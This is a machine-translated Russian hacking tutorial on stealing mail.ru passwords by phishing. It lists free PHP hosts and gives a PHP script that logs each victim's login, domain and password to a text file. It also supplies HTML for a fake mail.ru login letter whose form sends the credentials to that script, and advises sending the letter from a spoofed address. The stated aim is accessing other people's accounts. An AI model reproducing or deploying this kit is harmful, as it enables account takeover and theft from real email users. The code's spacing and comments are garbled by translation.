This page has been robot translated, sorry for typos if any. Original content here.

Hacking mail on mail.ru [SI]

[::. INTRO. ::]

Hello! In this article, I will tell you how to hack a mailbox on the free mail.ru mail service .

The article is intended for beginners in SI , as well as for any Internet user who wants to access someone else's account.

But okay, I won’t write about it for a long time, and it’s clear "why a cracker needs a mailbox, you will understand.

This article is good for beginners. Guru, please do not read :)

[::. PREPARATION. ::]

First, we need a free (preferably paid) hosting with PHP support.

* Just make sure that hosting supports PHP

You can register on any of these:

 nextmail.ru 
 hobby.ru 
 webrise.ru 
 lapin.ru 
 free.dl-hosting.ru 
 hostow.net 
 beplaced.ru 
 777host.ru 
 paltus.ru 
 miraclehost.ru 
 freebox.ru 
 alfaspace.net 
 k70.ru 
 hosting.promostudio.ru 
 chat.ru 
 maxhost.ru 
 nixup.com 
 e2e.ru 
 noka.ru 
 newmail.ru 
 boom.ru 
 h15.ru 
 hut.ru 
 jino-net.ru 
 pochta.ru 
 unlimhost.ru 
 onepage.ru 
 by.ru 
 sbn.bz 
 yard.ru 
 domainhosting.ru 
 orthodoxy.ru 
 webservis.ru 
 ru-web.net 
 activehost.ru 
 househost.ru 
 bestof.ru 
 addr.ru 
 hosting.dump.ru 
 pesni.ru 
 medbox.ru 
 fatal.ru 
 x5x.ru 
 hopshot.com 
 5gigs.com 
 wagoo.com 
 orgfree.com 
 awardspace.com 
 bobos.ca 
 www.host.sk 
 zportal.info 
 spaceall.de 
 3x.ro 
 sretenie.ru 
 dotgeek.org 
 sevhosting.net 
 o2g.net
 www.jino-net.ru
 www.nixup.com
 newmail.ru
 ho.com.ua
 wallSt.ru
 hut.ru
 holm.ru
 e2e.ru
 fatal.ru
 host.sk
 ut.ru
 H1.ru
 Hostmos.ru
 Webm.ru
 Rdcom.ru
 narod.ru
 front.ru
 nm.ru 
 chat.ru 
 boom.ru 
 by.ru

Registered? - move on!

What we need?

First, we need a sniffer (this is a script that allows us to save the received data in a text file).


PHP code:
  <? php
 
  $ f = fopen ( "mail.txt" , "at" );
  # file where to save flock ( $ f , 2 );
  fputs ( $ f , $ _GET [ 'Login' ]. "@" );
  # login fputs ( $ f , $ _GET [ 'Domain' ]);
  # domain fputs ( $ f , ";" . $ _GET [ 'Password' ]. "\ n" );
  # password flock ( $ f , 3 );
  fclose ( $ f );
  ?> <script> document.location.href = "/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312"; </script>

Consider the script in more detail.


PHP code:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

This line determines the place where we will redirect the user after authorization on the fake email .

  • Save to the mes.php file and upload to the hosting.
  • Also, create a mail.txt file in the directory with the script, and set the rights to it (chmod) 777.

Perhaps hosting is all!

We proceed to the letter itself, which we will send to the victim for soap.


Letter Code:
  < table class = readlet cellpadding = 0 cellspacing = 0 border = 0 width = "100%" > < tr >
 
  < td id = aj_body >
 
  < div id = let_body > < base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg" >
 
  < table cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < tr >
 
  < td > The user sent you a hidden letter . <br> To view the message, enter your username and password . <br> </ a > </ p > </ td >
 
  </ tr >
 
  </ table > < font color = 00 ;
  33 ;
  66 FACE = "Arial" >
 
  < h4 > Login </ h4 >
 
  </ font >
 
  < table cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < form method = "GET" action = "http: //addresses/mes.php" >
 
  < input type = "hidden" name = "mail" value = "1" >
 
  < tr >
 
  < td width = 75 >
 
  < img src = http : //img.mail.ru/0.gif height = 1> <br> Name
 
  </ td >
 
  < td width = 150 >
 
  < input type = "text" name = "Login" >
 
  </ td >
 
  < td width = 75 >
 
  < select name = "Domain" >
 
  < option value = "mail.ru" SELECTED > @ mail .
  com </ option >
 
  < option value = "inbox.ru" > @ inbox .
  com </ option >
 
  < option value = "list.ru" > @list.
  com </ option >
 
  < option value = "bk.ru" > @ bk .
  com </ option >
 
  </ select >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td >
 
  Password
 
  </ td >
 
  < td >
 
  < input type = "password" name = "Password" >
 
  </ td >
 
  < td >
 
  <a href = "http://www.mail.ru/pages/help/92.html" target = _new> Forgot your password ? </ a >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < input type = checkbox name = "level" value = 1 id = "alien" > < label for = "alien" > Another computer </ label >
 
  </ td >
 
  < td > </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < input type = "Submit" value = "Login" xstyle = "margin-top: 4px" >
 
  </ td >
 
  < td > </ td >
 
  </ tr > </ form >
 
  </ table > <br> <br>
 
  To learn more about the services , visit <a href = "http://corp.mail.ru" target = "_blank"> Corp.
  Mail
  Ru </ a > <br>
 
  National Postal Service <a href = "http://www.mail.ru" target = "_blank"> @ Mail .
  ru </ a > - the best free mail .
 
  < base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg" > </ div >
 
 

In the action parameter of the form tag, specify the address of your site (which you registered above) and the path to the mes.php sniffer .

[!] It should be noted that data must be transmitted using the "GET" method! Otherwise, nothing will come of it.

Now it remains to send the victim a letter , preferably with a spoofing address .

We copy the letter code into the input field and send it in html format, after filling in the fields.

If the victim pecks at it, then you're in luck :)

You can find out passwords in the mail.txt file .

[::. END. ::]

I think everything.

And how to approach hacking is up to you.

Thanks for your attention!

Waiting for your feedback just below this text.

And it’s better not to break anything;)

Bye and see you :)